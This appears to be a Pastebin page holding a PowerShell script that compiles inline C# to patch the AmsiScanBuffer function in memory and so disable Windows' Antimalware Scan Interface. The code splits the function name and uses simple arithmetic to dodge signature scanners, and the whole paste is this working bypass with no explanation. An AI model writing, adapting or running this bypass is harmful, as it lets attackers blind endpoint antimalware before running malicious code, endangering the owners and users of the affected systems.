Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $Assem = (
- "System, Version=4.0.0.0, Culture=neutral, PublickeyToken=b77a5c561934e089",
- "System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublickeyToken=b03f5f7f11d50a3a"
- )
- $Source = @"
- using System;
- using System.Runtime.InteropServices;
- namespace Bypass
- {
- public class AMSI
- {
- [DllImport("kernel32")]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
- [DllImport("kernel32")]
- public static extern IntPtr LoadLibrary(string name);
- [DllImport("kernel32")]
- public static extern IntPtr VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpfloldProtect);
- [DllImport("kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
- static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
- public static int Disable()
- {
- IntPtr TargetDLL = LoadLibrary("amsi.dll");
- IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
- UIntPtr dwSize = (UIntPtr)(5 + 5) - 5;
- uint Zero = (12 + 12) - 24;
- VirtualProtect(ASBPtr, dwSize, (0x40 + 0x40) - 0x40, out Zero);
- //Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
- Byte[] Patch = new byte [6];
- Patch[0] = 0xB8;
- Patch[1] = 0x57;
- Patch[2] = 0x00;
- Patch[3] = 0x07;
- Patch[4] = 0x80;
- Patch[5] = 0xC3;
- IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
- Marshal.Copy(new byte[] { Patch[0],Patch[1],Patch[2],Patch[3],Patch[4],Patch[5]}, 0, unmanagedPointer, 6);
- MoveMemory(ASBPtr, unmanagedPointer, 6);
- return 0;
- }
- }
- }
- "@
- add-Type -ReferencedAssemblies $Assem -TypeDefinition $Source -Language CSharp
Add Comment
Please, Sign In to add comment